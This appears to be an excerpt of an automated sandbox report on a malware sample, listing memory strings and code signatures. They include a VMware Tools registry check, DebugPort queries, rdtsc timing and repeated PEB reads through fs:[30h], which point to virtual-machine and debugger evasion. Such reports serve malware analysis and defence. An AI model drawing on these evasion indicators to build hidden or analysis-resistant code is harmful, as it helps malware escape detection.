            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004088B0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409B20 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05733540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05763D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0573A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05768DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057714FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05788ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057346A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0574FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057441E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057369A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05772073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05781074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]
